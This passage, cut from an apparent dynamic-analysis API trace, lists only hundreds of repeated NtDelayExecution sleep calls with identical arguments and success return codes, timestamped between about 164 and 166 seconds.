(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.682] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.685] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0165.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0166.942] NtDelayExecution 